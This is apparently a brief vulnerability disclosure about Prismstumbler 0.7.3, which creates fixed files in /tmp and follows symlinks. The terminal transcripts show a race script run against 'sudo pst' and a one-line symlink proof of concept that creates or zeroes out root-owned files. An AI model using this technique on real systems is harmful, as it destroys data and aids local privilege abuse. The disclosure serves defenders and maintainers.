I found a symlink vuln in this older program. Prismstumbler 0.7.3 is most often run as root to utilize all of its capabilities.

Prismstumbler (pst) creates /tmp/.psintercom and /tmp/spotkoord.txt by default. This can be changed within preferences.

srw-rw-rw- 1 root root 0 2009-04-02 00:44 .psintercom
-rw-r--r-- 1 root root 0 2009-04-02 00:44 spotkoord.txt

The /tmp/spotkoord.txt file follows symlinks and zeros out the linked file, while /tmp/.psintercom actually checks to see if it is there or not.

#
guy@Tengu:~/Tools$ sh tmp-racer.sh /tmp/spotkoord.txt sudo pst
Attempting to crack sudo...
[sudo] password for root:
Expected pid: 31425
Actual pid: 31425
Exit status: 0
Files /tmp/dir.31416/target and /tmp/dir.31416/original differ
I cracked sudo
#

Creation of root owned files. Or clobbering of root owned files.

guy@Tengu:/tmp$ ls -la rootfile
ls: cannot access rootfile: No such file or directory
guy@Tengu:/tmp$ ln -s rootfile spotkoord.txt
guy@Tengu:/tmp$ sudo pst
Can't connect to localhost.2947: Connection refused
eth1: ERROR while getting interface flags: No such device
Can't open pcap device: Operation not supportedCan't open pcap device: Operation not supportedguy@Tengu:/tmp$
guy@Tengu:/tmp$ ls -la rootfile
-rw-r--r-- 1 root root 0 2009-04-02 01:45 rootfile
guy@Tengu:/tmp$